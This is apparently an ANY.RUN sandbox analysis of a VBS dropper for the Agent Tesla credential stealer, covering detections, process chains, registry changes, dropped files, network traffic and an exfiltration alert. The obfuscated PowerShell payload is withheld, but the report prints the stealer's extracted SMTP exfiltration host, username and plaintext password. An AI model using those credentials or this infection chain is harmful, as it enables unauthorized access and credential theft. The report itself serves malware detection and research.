File name: 6b3541fd675b6b9b1ab2450e632e54e8b950975a807e74f0e1e0d87563c9aca7.vbs

Full analysis: https://app.any.run/tasks/7dada979-0903-4dc6-b784-2f51e4a1c855
Verdict: Malicious activity
Threats:

Agent Tesla is spyware that collects information about its victims' actions by recording keystrokes and user interactions. It is falsely marketed as legitimate software on the dedicated website where this malware is sold.

Analysis date: March 19, 2024, 09:00:57
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
stealer
agenttesla
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (335), with CRLF line terminators
MD5: 807AB2044EB4C9BE0AAE827CEF21DBE9
SHA1: AFE94F9DFDC9D6CDAD94EBB8C6FEC4DD17FF2EC2
SHA256: 6B3541FD675B6B9B1AB2450E632E54E8B950975A807E74F0E1E0D87563C9ACA7
SSDEEP: 192:nLB+BSKoP0h+G4cszTHlyNWioYJ+dXhnlbp/Iu5YQioN1ytucyoS6AK2mFAt:kSwh+oszTHvYAZBSQJ4rS6BM

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Steals credentials from Web Browsers

      • wab.exe (PID: 3352)
    • Actions looks like stealing of personal data

      • wab.exe (PID: 3352)
    • Scans artifacts that could help determine the target

      • wab.exe (PID: 3352)
    • AGENTTESLA has been detected (YARA)

      • wab.exe (PID: 3352)
    • Connects to the CnC server

      • wab.exe (PID: 3352)
    • AGENTTESLA has been detected (SURICATA)

      • wab.exe (PID: 3352)
  • SUSPICIOUS

    • Reads data from a binary Stream object (SCRIPT)

      • wscript.exe (PID: 2496)
    • Suspicious use of asymmetric encryption in PowerShell

      • wscript.exe (PID: 2496)
      • powershell.exe (PID: 4076)
    • Creates FileSystem object to access computer's file system (SCRIPT)

      • wscript.exe (PID: 2496)
    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 2496)
      • powershell.exe (PID: 4076)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 2496)
    • Reads security settings of Internet Explorer

      • wab.exe (PID: 3352)
    • Checks Windows Trust Settings

      • wab.exe (PID: 3352)
    • Connects to SMTP port

      • wab.exe (PID: 3352)
  • INFO

    • Creates or changes the value of an item property via Powershell

      • wscript.exe (PID: 2496)
      • powershell.exe (PID: 4076)
    • Reads the computer name

      • wab.exe (PID: 3352)
    • Checks supported languages

      • wab.exe (PID: 3352)
    • Checks proxy server information

      • wab.exe (PID: 3352)
      • slui.exe (PID: 2584)
    • Creates files or folders in the user directory

      • wab.exe (PID: 3352)
    • Reads the machine GUID from the registry

      • wab.exe (PID: 3352)
    • Reads the software policy settings

      • wab.exe (PID: 3352)
      • slui.exe (PID: 2584)
    • Reads Environment values

      • wab.exe (PID: 3352)
    • Reads Microsoft Office registry keys

      • wab.exe (PID: 3352)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

AgentTesla

(PID) Process: (3352) wab.exe
Protocol: smtp
Host: smtp.crane-eletronics.com
Port: 587
Username: pen@crane-eletronics.com
Password: peFyHns8

All screenshots are available in the full report
Total processes: 135
Monitored processes: 6
Malicious processes: 4
Suspicious processes: 0

Behavior graph

start: wscript.exe (no specs), powershell.exe (no specs), conhost.exe (no specs), powershell.exe (no specs), wab.exe (#AGENTTESLA), slui.exe

Process information

PID: 2496
CMD: "C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\6b3541fd675b6b9b1ab2450e632e54e8b950975a807e74f0e1e0d87563c9aca7.vbs"
Path: C:\Windows\System32\wscript.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 2584
CMD: C:\WINDOWS\System32\slui.exe -Embedding
Path: C:\Windows\System32\slui.exe
Parent process: svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
PID: 3352
CMD: "C:\Program Files (x86)\windows mail\wab.exe"
Path: C:\Program Files (x86)\Windows Mail\wab.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Contacts
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\mshtml.dll
c:\program files (x86)\windows mail\wab.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
PID: 4076
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" followed by an obfuscated inline PowerShell script (not reproduced here)
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
PID: 4968
CMD: "C:\WINDOWS\syswow64\WindowsPowerShell\v1.0\powershell.exe" followed by the same obfuscated inline PowerShell script as PID 4076 (not reproduced here)
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
PID: 6308
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events: 14 495
Read events: 14 471
Write events: 24
Delete events: 0

Modification events

(PID) Process: (2496) wscript.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: ProxyBypass
Value: 1

(PID) Process: (2496) wscript.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: IntranetName
Value: 1

(PID) Process: (2496) wscript.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: UNCAsIntranet
Value: 1

(PID) Process: (2496) wscript.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: AutoDetect
Value: 0

(PID) Process: (4968) powershell.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: ProxyBypass
Value: 1

(PID) Process: (4968) powershell.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: IntranetName
Value: 1

(PID) Process: (4968) powershell.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: UNCAsIntranet
Value: 1

(PID) Process: (4968) powershell.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: AutoDetect
Value: 0

(PID) Process: (3352) wab.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: ProxyBypass
Value: 1

(PID) Process: (3352) wab.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: IntranetName
Value: 1
Executable files: 0
Suspicious files: 4
Text files: 5
Unknown types: 6

Dropped files

PID: 4076
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_dz2akq1x.3ov.ps1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 4968
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Type: binary
MD5: C76555487F3760099709FD7487BFB259
SHA256: AD8BEE1720C0631AAD060FC8CDC56D9B6AB83541731C816EA3D0AA2D073CE861

PID: 4968
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_lvz002jq.cws.ps1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 4076
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_rhfexjqm.4kt.psm1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 4968
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_2ybgm05j.yqa.psm1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 3352
Process: wab.exe
Filename: C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Type: binary
MD5: DBA737766CAA750561A7D1EF422724CB
SHA256: 5709B340759D61E0BE8D4258B9BA874F6DE6E02E9519E6BB5FF32CEF2F4B5D16

PID: 3352
Process: wab.exe
Filename: C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA
Type: binary
MD5: AC89A852C2AAA3D389B2D2DD312AD367
SHA256: 0B720E19270C672F9B6E0EC40B468AC49376807DE08A814573FE038779534F45

PID: 3352
Process: wab.exe
Filename: C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_2517452929F0CAF6449847D40B7C277D
Type: binary
MD5: 07D62BA8CD29FBF8A6F1E4201594CE29
SHA256: 24398D01735E1A2C5AEC70AB2CC64D5DC8C87D495EBFC055524BC237DEE32834

PID: 3352
Process: wab.exe
Filename: C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_2517452929F0CAF6449847D40B7C277D
Type: binary
MD5: DC3BCD2BC8D3E814D4768E6FD184899B
SHA256: CCDBB4D96F100596B3FCBACF8866C86180033D2C94FC0BCB76298E01CB0797A1

PID: 4076
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Type: binary
MD5: D67654703E5D515BF5D23C13C334E627
SHA256: 60A3D186FC02C9AB124B9DA470598A598F4B846929A0FF24B9945714CBEAE17E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 8
TCP/UDP connections: 34
DNS requests: 15
Threats: 3

HTTP requests

PID: 3996
Process: svchost.exe
Method: GET
HTTP Code: 200
IP: 192.229.221.95:80
URL: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
CN: unknown
Type: binary
Size: 471 b
Reputation: unknown

PID: 1260
Process: backgroundTaskHost.exe
Method: GET
HTTP Code: 200
IP: 192.229.221.95:80
URL: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAzlnDD9eoNTLi0BRrMy%2BWU%3D
CN: unknown
Size: 313 b
Reputation: unknown

PID: 3732
Process: SIHClient.exe
Method: GET
HTTP Code: 200
IP: 184.30.21.171:80
URL: http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
CN: unknown
Type: binary
Size: 409 b
Reputation: unknown

PID: 3352
Process: wab.exe
Method: GET
HTTP Code: 200
IP: 172.217.16.131:80
URL: http://ocsp.pki.goog/gsr1/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6%2BMgGqMQQUYHtmGkUNl8qJUC99BM00qP%2F8%2FUsCEHe9DWzbNvka6iEPxPBY0w0%3D
CN: unknown
Type: binary
Size: 1.41 Kb
Reputation: unknown

PID: 4800
Process: backgroundTaskHost.exe
Method: GET
HTTP Code: 200
IP: 192.229.221.95:80
URL: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA177el9ggmWelJjG4vdGL0%3D
CN: unknown
Type: binary
Size: 471 b
Reputation: unknown

PID: 3352
Process: wab.exe
Method: GET
HTTP Code: 200
IP: 172.217.16.131:80
URL: http://ocsp.pki.goog/gtsr1/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBQwkcLWD4LqGJ7bE7B1XZsEbmfwUAQU5K8rJnEaK0gnhS9SZizv8IkTcT4CDQIDvFNZazTHGPUBUGY%3D
CN: unknown
Type: binary
Size: 724 b
Reputation: unknown

PID: 3352
Process: wab.exe
Method: GET
HTTP Code: 200
IP: 172.217.16.131:80
URL: http://ocsp.pki.goog/gts1c3/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBTHLnmK3f9hNLO67UdCuLvGwCQHYwQUinR%2Fr4XN7pXNPZzQ4kYU83E1HScCEQCRd4hKrA6aBAnnS3UYBsso
CN: unknown
Type: binary
Size: 472 b
Reputation: unknown

PID: 3352
Process: wab.exe
Method: GET
HTTP Code: 200
IP: 172.217.16.131:80
URL: http://ocsp.pki.goog/gts1c3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTHLnmK3f9hNLO67UdCuLvGwCQHYwQUinR%2Fr4XN7pXNPZzQ4kYU83E1HScCECzpBwEAqmZNCdn%2B9lFcFjc%3D
CN: unknown
Size: 471 b
Reputation: unknown

Connections

IP: 239.255.255.250:1900
Reputation: unknown

PID: 6140
Process: svchost.exe
IP: 51.104.136.2:443
Domain: settings-win.data.microsoft.com
ASN: MICROSOFT-CORP-MSN-AS-BLOCK
CN: IE
Reputation: whitelisted

PID: 3996
Process: svchost.exe
IP: 20.190.159.73:443
ASN: MICROSOFT-CORP-MSN-AS-BLOCK
CN: IE
Reputation: whitelisted

PID: 1280
Process: MoUsoCoreWorker.exe
IP: 51.104.136.2:443
Domain: settings-win.data.microsoft.com
ASN: MICROSOFT-CORP-MSN-AS-BLOCK
CN: IE
Reputation: whitelisted

PID: 3996
Process: svchost.exe
IP: 192.229.221.95:80
Domain: ocsp.digicert.com
ASN: EDGECAST
CN: US
Reputation: whitelisted

PID: 700
Process: svchost.exe
IP: 142.250.186.78:443
Domain: drive.google.com
ASN: GOOGLE
CN: US
Reputation: whitelisted

PID: 700
Process: svchost.exe
IP: 142.250.186.65:443
Domain: drive.usercontent.google.com
ASN: GOOGLE
CN: US
Reputation: whitelisted

PID: 3996
Process: svchost.exe
IP: 20.190.159.23:443
ASN: MICROSOFT-CORP-MSN-AS-BLOCK
CN: IE
Reputation: unknown

PID: 1260
Process: backgroundTaskHost.exe
IP: 104.126.37.162:443
Domain: www.bing.com
ASN: Akamai International B.V.
CN: DE
Reputation: unknown

PID: 1260
Process: backgroundTaskHost.exe
IP: 192.229.221.95:80
Domain: ocsp.digicert.com
ASN: EDGECAST
CN: US
Reputation: whitelisted

DNS requests

Domain
IP
Reputation
ocsp.digicert.com
  • 192.229.221.95
whitelisted
settings-win.data.microsoft.com
  • 51.104.136.2
whitelisted
drive.google.com
  • 142.250.186.78
shared
drive.usercontent.google.com
  • 142.250.186.65
unknown
www.bing.com
  • 104.126.37.162
  • 104.126.37.161
  • 104.126.37.163
  • 104.126.37.171
  • 104.126.37.168
  • 104.126.37.160
  • 104.126.37.147
  • 104.126.37.155
  • 104.126.37.153
whitelisted
arc.msn.com
  • 20.223.35.26
whitelisted
slscr.update.microsoft.com
  • 20.12.23.50
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 20.3.187.198
whitelisted
ocsp.pki.goog
  • 172.217.16.131
whitelisted

Threats

PID: 3352
Process: wab.exe
Class: A Network Trojan was detected
Message: STEALER [ANY.RUN] AgentTesla Exfiltration (raw TCP)
2 ETPRO signatures available at the full report
No debug info